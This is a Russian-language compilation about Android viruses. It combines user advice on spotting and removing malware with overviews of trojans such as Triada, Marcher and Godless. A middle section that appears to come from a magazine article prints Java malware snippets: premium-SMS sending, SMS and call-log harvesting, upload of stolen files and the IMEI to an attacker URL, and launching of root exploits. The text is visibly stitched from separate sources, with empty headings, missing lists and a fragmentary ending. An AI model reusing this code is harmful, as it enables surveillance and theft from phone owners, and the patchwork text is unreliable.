Вирусы могут быть двух типов:
1. Подделка - используется название и значок какого-нибудь известного приложения, но внутри только зловредный код. Большая часть вирусов именно такого типа.
2. Троянский конь - в нормальное приложение добавляется зловредный код, который работает вместе с приложением.
1. Воровать деньги с SIM-карты: звонить или отправлять SMS на платные номера до тех пор, пока на SIM-карте не закончатся деньги.
2. Воровать информацию: отправлять пароли от интернет-банков, данные банковских карт или личные файлы мошенникам, рассылать сообщения с вирусными ссылками на номера из записной книги от вашего имени.
3. Блокировать нормальную работу устройства: отображать баннер-вымогатель, который не дает пользоваться устройством.
4. Использовать мощность вашего устройства: показывать скрытую рекламу или майнить криптовалюты.
Мошенники маскируют вирусы под безобидные приложения и файлы: браузеры, плееры, игры, навигаторы, книги, антивирусы. Затем они распространяют их:
Например, ищете в интернете какую-нибудь игру или программу, и попадаете на форум. Кто-то оставил нужную ссылку, и все дружно его благодарят.
На самом деле форум и комментаторы не настоящие.
Или заходите сайт с пиратскими фильмами и сериалами, появляется сообщение. В нем написано, что смартфон/планшет заражен вирусами или какая-то программа сильно устарела. Бывает даже так, что устройство начинает вибрировать или издавать странные звуки.
На самом деле это не так и с устройством все в порядке.
Как правило, это SMS от «девушек с сайтов знакомств», с сайтов бесплатных объявлений, письма от «нотариусов из Германии», сообщения о выигрыше в лотерею.
Будьте осторожны, чудес не бывает. В большинстве случев это мошенники.
У всех подобных сообщений общая цель - заставить вас нажать на ссылку, чтобы вирус скачался на устройство.
Чтобы вирус начал работать, мало его скачать, - надо еще и установить. Обычно вирусы загружаются в папку «Загрузки» (Download) и выглядят как установочные файлы приложений с расширением «apk».
Если нажать на вирус, появится список разрешений. Разрешения - это те действия, которые приложение сможет выполнять после установки.
Если нажать «Установить», вирус установится и начнет работать.
Большая часть вирусов пишется непрофессионалами, которые хотят быстро и без особых проблем с законом получить денег. Поэтому стандартные приметы таких вирусов - разрешения для отправки сообщений или звонков. Когда такой вирус установится, он начнет незаметно отправлять SMS или звонить на платные номера.
Сравним настоящие приложения и вирусы. Антивирус Dr.Web:
Разрешения оригинального антивируса из Play Маркет
Разрешения вируса, который выдает себя за антивирус
Яндекс Навигатор:
Разрешения оригинального навигатора из Play Маркет
Разрешения вируса, который выдает себя за навигатор
Игра Говорящий Том 2:
Разрешения оригинальной игры Том 2 из Play Маркет
Разрешения вируса, который выдает себя за игру Том 2
Конечно, не все приложения, которые запрашивают доступ к звонкам и сообщениям, - вирусы. И не все вирусы запрашивают доступ к платным функциям.
Если мошенники захотят поснимать вашей камерой - потребуется доступ к камере и интернету.
Если потребуются ваши файлы - попросят доступ к памяти и интернету.
Захотят заблокировать экран баннером - запросят права администратора.
А некоторые вирусы вообще умеют скрывать разрешения при установке.
Опознать качественно сделанный вирус сложно - либо нужно смотреть исходный код приложения, либо установить вирус на устройство, снять с него логи (журнал происшествий) и разбираться в них. К счастью, такие вирусы встречаются редко. Чаще вам пригодятся два ориентира:
Если приложение скачалось с неизвестного сайта и запрашивает доступ к платным функциям - это вирус в 99% случаев.
Отличить вирус от нормального приложения неподготовленному человеку очень сложно. Чтобы обезопасить пользователей, компания Google сделала специальный каталог с приложениями - Play Маркет.
Прежде чем добавить приложение в Play Маркет, Google проверяет, нет ли в нем зловредного кода. Пользователи, которые скачивают приложения из Play Маркет, более защищены, чем те, которые скачивают приложения с разных сайтов и форумов. Но помните, что нет ничего полностью безопасного, поэтому подходите к выбору приложений серьезно: внимательно читайте разрешения и смотрите на рейтинги.
Мошенники даже научились подделывать номера и адреса электронной почты, поэтому сообщения с вирусными ссылками могут приходить и от ваших знакомых.
Если на устройстве есть рут, вирус сможет прописаться в системные приложения и тогда его сможет удалить только полная перепрошивка устройства.
Мошенники могут автоматически загружать вирусы на устройство через MMS. Это связано с уязвимостями библиотеки Stagefright.
Чтобы отключить автозагрузку MMS выберите: Сообщения → Опции → Настройки → (Дополнительно) → MMS → Автополучение (Автозагрузка) → Отключить.
Если вдруг на устройство попадет вирус, который отправляет SMS на платные номера, то баланс SIM-карты будет пополняться до тех пор, пока деньги на карте не закончатся. Сообщения от банка при этом обычно блокируются.
Совет: для получения сообщений от банков и других важных отправителей купите отдельный номер, который никто не будет знать, и простой телефон.
Не существует однозначных признаков, все зависит от вируса. Одни заметны сразу после установки (появляется баннер и блокируется доступ к устройству), другие могут долгое время себя не выдавать. В большинстве случаев признаки такие:
Если на экране появился баннер-вымогатель и не дает пользоваться устройством:
Не перечисляйте деньги мошенникам - они все равно не разблокируют устройство.
Вытащите SIM-карту, чтобы не списались деньги со счета.
Загрузите устройство в безопасном режиме.
Если баннер в безопасном режиме пропал, отключите права администратора у всех приложений.
Если баннер не пропал, перейдите к пункту №11.
Просмотрите все установленные приложения и удалите неизвестные вам.
Перезагрузите устройство. Устройство загрузится в обычном режиме, баннера не должен быть.
Если после перезагрузки баннер появился, перейдите к пункту №11.
Скачайте антивирус, которому доверяете, через Wi-Fi из Play Маркет.
Устройство вирусов и механизмы работы антивирусов меняются ежедневно, поэтому посоветовать какой-то конкретный антивирус невозможно. Ориентируйтесь на рейтинги других пользователей и отзывы. По мнению автора, неплохие антивирусы: Eset, Kaspersky и Dr. Web.
Проверьте устройство антивирусом и удалите все найденные вирусы.
Удалите антивирус, который установили.
Скачайте другой антивирус и проверьте устройство еще раз.
Если предыдущие варианты не помогают, сделайте сброс данных устройства.
Если самостоятельно справиться с вирусом не удается, обратитесь в сервисный центр Samsung.
Если вы начинающий пользователь и не уверены в своих силах - нужен. Но только один.
Если пользуетесь устройством осторожно и соблюдаете правила безопасности, антивирус можно не устанавливать.
На сегодняшний день OS Android позиционируется как одна из наиболее популярных операционных систем – под ее управлением работает более 70% устройств по всему миру.
Причина в ее доступности: производитель использует открытый код для «заточки» под многочисленные гаджеты и дает возможность самостоятельно изменить внешний вид оболочки, прошить смартфон, получить и так далее.
Эти стремления к персонализации, в конечном итоге, были взяты на вооружение злоумышленниками, в результате чего на свет появилось огромное количество вредоносных программ, внедряющихся в открытый код передающих бразды правления устройством в чужие руки.
Android считается достаточно защищенной операционной системой. Не зря умные люди придумали Google Play – бОльшая часть всего софта фильтруется на наличие вирусов, что защищает пользователя от несанкционированного внедрения. Снимая запрет на установку из неизвестных источников, можно своими руками открыть сомнительным приложениям доступ к системе девайса.
В основном, большинство вредоносных программ попадает в систему путем скачивания софта со сторонних файлообменников, например, когда обладатель смартфона пытается безвозмездно приобрести платное приложение или программу, которой нет в Google Play. Также можно «подцепить» вирус при вводе номера телефона на различных сайтах: так вы попадете в базу данных злоумышленников, после на телефон начнут приходить сообщения со странными ссылками, после перехода на которые вредоносное ПО автоматически закачается на устройство и нанесет вред его обладателю.
Классические трояны . Стары, как мир, но до сих пор успешно функционируют. Основное их назначение – кража личных данных пользователя: контактов, личных переписок, логинов/паролей от сайтов и номеров банковских карт. Заработать такую напасть можно как через сомнительное приложение, так и посредством перехода по короткой ссылке из знакомых каждому SMS-сообщений вроде «Вам пришло фото, смотреть здесь».
В последнее время такие вирусы все чаще настроены на взлом приложения вроде «Мобильного банка», поскольку так злоумышленники получают возможность перевести все деньги жертвы на свой счет.
Вирусы, дающие возможность получить root-права . В момент, когда смартфон подвергается заражению этим вирусом, злоумышленники получают права администрирования. С этого момента им доступны любые удаленные действия с устройством: отправка SMS от имени пользователя, совершение звонков, управление работой девайса, установка софта, все коды доступа, пароли и так далее.
Рассылка платных СМС-сообщений . Они в свое время были очень популярны на сайтах файлообменников, содержащих бесплатные приложения. Как только владелец устройства скачивает программу, с его номера автоматически начинают отправляться сообщения на платные короткие номера. Либо, как вариант, автоматически оформляются подписки на некий несуществующий контент, за мнимое пользование которым обладатель девайса платит от 20 до 60 руб. ежесуточно.
Как правило, пока причина стремительной потери средств будет установлена, пользователь успеет потерять приличную сумму.
«Подслушивающие вирусы» . Такого рода ПО призвано записывать все телефонные разговоры пользователя, некоторые подвиды настроены выборочно вылавливать из этих разговоров важную информацию: номера телефонов, банковских счетов и кредитных карт, логины, пароли и прочую конфиденциальную информацию.
Рекламные модули приложений . Наверное, каждый замечал при работе с некоторыми приложениями навязчивый рекламный баннер, внезапно выскакивающий посреди экрана. В некоторых случаях при клике на него создатель получает определенную сумму со счета пользователя. В большинстве своем подобная акция является разовой и не влечет регулярной потери средств, хотя иногда обладатель смартфона получает пакет параллельно действующих вирусов.
Для защиты от разнообразного вредоносного ПО обладателям смартфонов на базе Android следует отказаться от установки софта из непроверенных источников, пользоваться антивирусами, регулярно и просто быть предусмотрительным.
В коллекции вредоносных Android-приложений некоторых антивирусных лабораторий содержится уже более 10 миллионов образцов. Эта цифра будоражит воображение, но примерно 9 миллионов 995 тысяч из них - переименованные копии оригинальных вирусов. Но если проанализировать исходный код оставшихся нескольких тысяч образцов малвари, то можно заметить, что все они комбинируются из небольшого количества уникальных функциональных блоков (несколько видоизмененных и по-разному скомбинированных).
Все дело в том, что вирмэйкеры чаще всего преследуют весьма тривиальные задачи:
Кто использует:
Самым распространенным типом вирусов являются SMS-трояны. Эти вирусы просто отправляют сообщения на платные номера без согласия пользователя. Создать такую программу или переписать готовую под нужный номер совсем легко. Да и процесс получения выгоды предельно упрощен - в отличие, например, от отслеживания банковских данных.
Далее приведен простейший пример кода. Это элементарная функция отправки SMS. Ее можно усложнить проверкой статуса отправки, выбором номеров в зависимости от места положения абонента и последующим удалением SMS.
Private static SendSms (String DestNumber, String SmsText) { // Попытка запуска метода sendTextMessage объекта SmsManager (стандартная программа для отправки SMS у текущего устройства) с минимальным количеством параметров: номер получателя и текст сообщения try{ SmsManager.getDefault().sendTextMessage(DestNumber,null,SmsText,null,null); return true; } }
В абсолютном большинстве случаев заражение телефона происходит через установку приложений. Любое приложение для Android существует в виде файла с расширением apk, который, по сути, является архивом. Просмотреть его содержимое можно с помощью Android SDK, конвертера файлов APK в JAR и декомпилятора Java-байт-кода. Сборка приложения (APK) состоит из следующих частей:
Кто использует:
Существует категория вирусов, которая охотится за персональными данными пользователей. Механизм их действия также несложен. Они либо загружают на сервер своего создателя файлы юзера, либо предварительно собирают какие-либо данные в txt (CSV, XML - не принципиально). Интерес для злоумышленников могут представлять контакты любого типа, сообщения из разных мессенджеров, медиафайлы и прочее.
SMS зараженных юзеров особенно ценны номерами телефонов отправителей и получателей - ими можно пополнить базу для спам-рассылок. Реже вирусы такого рода используются для заражения устройств конкретных личностей - в следующий раз, когда твоя девушка предложит тебе протестировать написанное ей (ай, карамба! - Прим. ред.) приложение на Android, не теряй бдительности:).
// Считаем количество SMS на устройстве arrayOfObject = (Object)localBundle.get("pdus"); int j=arrayOfObject.length; // Обходим по циклу каждую SMS i=1 while (true) { if(i>=j) break; // Создаем объект SMS-сообщение SmsMessage localSmsMessage=SmsMessage.createFrompdu((byte)arrayOfObject[i]); // Кладем в строковые переменные номер отправителя, текст и время отправки SMS String MessageNumber = localSmsMessage.getOriginatingAddress(); String MessageText = localSmsMessage.getDisplayMessageBody(); long l= localSmsMessage.getTimestampMillis(); Date localDate=new Date(l); String MessageTimeDate = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(localDate); // Формируем из полученных данных строку и записываем ее в текстовый файл пользовательским методом WriteRec String MessageInfo= 7MessageNumber+"#"+ MessageText+"#"+ MessageTimeDate+";" WriteRec(paramContext,"sms.txt",MessageInfo); // Переходим к следующему сообщению i+=1; } Также спам-лист удобно пополнять из истории вызовов абонента. Вот такой код может запускаться при входящем звонке: If (parmIntent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL")) { // Кладем в переменную номер абонента String phonenumber=paramIntent.getStringExtra("android.intent.extra.PHONE_NUMBER"); // Формируем строку из номера и даты звонка String PhoneCallRecord= phonenumber +"#"+getSystemTime(); // Вызываем метод WriteRec() (его код здесь не приводится), который добавляет строку в текстовый файл с историей звонков WriteRec(paramContext,"phonecall.txt", PhoneCallRecord); }
После того как информация записана, она переправляется в «нужные руки». Приведенный ниже код загружает историю звонков на сервер:
Private void uploadPhonecallHistory() throws IDException { while(true) { return; // Проверяем, есть ли нужный нам файл if(!fileIsExists(/data/data/spyapp.pg/files/phonecall.txt")) continue; // Создаем объект - загрузчик файлов UploadFiles localUploadFiles=new UploadFiles(); String uploadkeynode=getKeyNode("uid","uid_v"); // Запускаем метод.advanceduploadfile (его код здесь не приводится) для загрузки файла на сервер «вирусмейкера» localUploadFiles.advanceduploadfile(uploadkeynode,"/data/data/spyapp.pg/files/phonecall.txt"); } }
Кто использует:
В принципе, любому вирусмейкеру полезна информация о зараженных его программами устройствах. Получить ее очень просто. Создается массив с данными о свойствах телефона (их полный список можно посмотреть в руководстве Android-разработчика) и отправляется POST-запросом к PHP-скрипту (язык непринципиален) на сервере злоумышленника, тот обрабатывает данные и помещает их в базу данных для последующего использования.
Private void reportState(int paramInt, string paramString) { // Создаем массив и кладем в него служебную информацию ArrayList UserInformation=new ArrayList(); UserInformation.add(new BasicNameValuePair("imei", this.mImei)); UserInformation.add(new BasicNameValuePair("taskid", this.mTaskId)); UserInformation.add(new BasicNameValuePair("state", Integer.toString(paramInt))); // Если у функции определен параметр «paramString(комментарий)», кладем в массив и его if(paramStrng !=null)&&(!"".equals(paramString))) UserInformation.add(new BasicNameValuePair("comment", paramString)); // Создаем HTTP POST запрос с адресом скрипта, который осуществляет сбор данных HttpPost localHttpPost = new HttpPost("http://search.virusxxxdomain.com:8511/search/rtpy.php"); try { // Добавляем в запрос наш массив с данными и выполняем его с помощью стандартного HTTP-клиента localHttpPost.setEntity(new UrlEncodeFormEntity(UserInformation, "UTF-8"))); new DefaultHttpClient().execute(localHttpPost).getStatusLine.getStatusCode(); return; } }
Кто использует:
Одна из самых неприятных вещей, которая может произойти с Android-устройством, - это его рутинг вирусом. Ведь после этого зловредная программа может делать с ним что угодно: устанавливать другие вирусы, менять настройки аппаратного обеспечения. Совершается это действо путем последовательного запуска эксплойтов:
Private void RootFunc() { ApplicationInfo localApplicationInfo =getApplicationInfo(); /*"ratc" - это копия знаменитого root-эксплойта Rage Against The Cage. Kiall - остановка всех процессов, запущенных текущим приложением. Gjsvro - эксплойт для приобретения прав udev (используются в Linux-системах для расширенной работы с аппаратным обеспечением и сетевыми интерфейсами). Все это копируем в нужное место */ Utils.copyAssets(this,"ratc","/data/data"+localApplicationInfo.packageName + "/ratc"); Utils.copyAssets(this,"killall","/data/data"+localApplicationInfo.packageName + "/killall"); Utils.copyAssets(this,"gjsvro","/data/data"+localApplicationInfo.packageName + "/gjsvro"); //И запускаем с помощью командной строки Utils.oldrun("/system/bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/ratc"); Utils.oldrun("/system/bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/killall"); Utils.oldrun("/system/bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/gjsvro"); new MyTread.start(); }
Блог экспертов компании Kasperskiy Lab Этот ресурс содержит качественные и подробные статьи о многих аспектах компьютерной безопасности, в том числе и об Android-вирусах. Стоит регулярно посещать этот сайт, чтобы быть в курсе последних событий.
Группа посвящена open source инструменту для всевозможных манипуляций с кодом Android-приложений (декомпиляция и модификация DEX/ODEX/APK файлов и так далее). Androguard также содержит обширную базу статей про вирусы. Помимо кратких обзоров функционала и методов защиты, встречаются подробные анализы кода малвари.
Раздел Mobile Threats на www.fortiguard.com Энциклопедии телефонных вирусов. Каждая статья - обзор функционала, приправленный значительным количеством технических деталей. Помимо информации об угрозах для операционной системы Android, есть статьи и про вирусы для Symbian OS, iOS и других платформ.
Некоторые пользователи считают, что если скачивать приложения исключительно из Google Play и установить на смартфон антивирус, то это стопроцентно гарантирует безопасность. Не стоит обольщаться: в Сети регулярно появляются сообщения о нахождении малвари в официальном маркете. А количество вновь появившихся зловредных программ измеряется сотнями тысяч в месяц, что затрудняет их своевременное попадание в базы антивирусных программ. Реальную гарантию безопасности может дать ручной просмотр кода APK-файла перед установкой его на телефон. Не нужно быть гуру кодинга, чтобы заметить вредоносные фрагменты. А наша статья поможет тебе в этом.
Как мы видим из примеров, мобильный вирмейкинг технологической сложностью не отличается. Конечно, данные примеры упрощены под формат журнала - прежде всего, упущены обработчики ошибок и исключений, а также отдельные технические мелочи, отсутствие которых не помешает тебе понять принципы работы Android-малвари, но оградит от ненужных экспериментов. Ведь мы не поддерживаем создание вирусов, не так ли? 🙂
Начнём со «свежака» - Триаду сегодня можно считать самым новым и «пуленепробиваемым» вирусом для смартфонов. Его и обнаружили-то только в марте 2017 года.
Уникален он своей близостью к классическим вирусам, а не троянам-вымогателям, как это обычно бывает на Android. Вам всё же нужно умудриться подхватить его из «непроверенных источников», а вот дальше начинается гораздо весёлый «боевичок»:
Triada - вирус, который не просто хулиганит в системе, а вклинивается в её жизненно важные участки
Но с возможностью «распотрошить» любое установленное приложение или установить новое на расстоянии это только «цветочки» - особенность «Триады» заключается в том, что это модульный вирус, к нему можно будет прикрутить самые разные виды дистанционных трюков.
Как видите, вирусы для Android - это не только примитивные «ваш телефон заблокирован, с вас сто баксов», от которых можно избавиться удалением приложения. И, если в новых версиях Android хотя бы усложнён доступ к получению root и можно увидеть что-то подозрительное на этапе запроса прав приложением, то старые версии (Android 4.4, 4.3 и старее) абсолютно беззащитны перед новой заразой - спасёт только полная перепрошивка.
Так называемый «банковский зловред» был разработан ещё в 2013 году, но его «звёздный час» настал только летом 2016 года. Знаменит хорошей маскировкой и «интернационализмом», если можно так сказать.
Marcher представляет собой простой троян, который не проворачивает ничего сверхъестественного, а просто подменяет собой служебные страницы огромного количества банков с помощью всплывающих окон. Механизм следующий:
«Дружище, что-то я подзабыл номер твоей карты. Не напомнишь?»
Таким нехитрым образом троян подделывал процесс покупки авиабилетов, покупки товаров в интернет-магазинах и софта в Google Play и работу банковских приложений. Под раздачу попали пользователи банковских карт в Германии, Франции, Польши, Турции, США, Австралии, Испании, Австрии и Великобритании. Изначально вирус «точили» под Android 6.x, смартфонов под управлением других версий оказалось значительно меньше.
Даже не одиночка, а целый каскад троянов-«хамелеонов», не настолько криминально-суровых, как Triada, но в такой же степени болезненных для операционной системы. Антивирусные специалисты обратили внимание на зловредов в начале 2016 года, а в народ смартфоны зловред стал массово проникать уже в декабре 2016-го.
Loki - это такой организованный разбой по предварительному сговору в вашем смартфоне
Зловреды действуют настолько быстро и слаженно, что хочется аплодировать им стоя. Вы только взгляните на эту «многоходовочку»:
«Выкорчевать» из мозгов смартфона следы этой бурной деятельности невозможно, поэтому «лечится» заражение с помощью Loki только полной перепрошивкой с потерей всех данных.
Если предыдущие трояны намеренно действуют исподтишка, чтобы пользователь смартфона до последнего момента не догадывался о заражении, то Faketoken в своём подходе прост и прямолинеен, как опытный гопник - требует предоставить ему права на любые действия со смартфоном, а если владелец отказывается, в дело вступает алгоритм «слышь, ты чё не понял? Тогда я повторю!».
Троян Godless впечатляет даже не своей, так сказать, функциональностью, а маскировкой - длительное время его наличие в приложениях не распознавала даже хваленая система антивирусной проверки в Google Play. Результат немного предсказуем - зловред заразил свыше 850 тысяч смартфонов по всему миру, причём почти половина из них принадлежит жителям Индии, что как бы намекает на происхождение трояна.
Скачиваешь себе фонарик из Google Play - подхватываешь неудаляемый вирус с шифрованием и root-правами
Функциональность трояна слабо отличается от его многочисленных коллег в 2016 году, новым стал только «зачин»:
Среди приложений, к которым чаще всего «прикручивали» Godless, были многочисленные «фонарики» и клоны известных игр для Android.вирусы , черви , трояны , adware (навязчивую рекламу) и «страшилки» , но почти никого не заботят такие тонкости. Мол, вирусы - они и есть вирусы.
Различия между «сортами радости» следующие: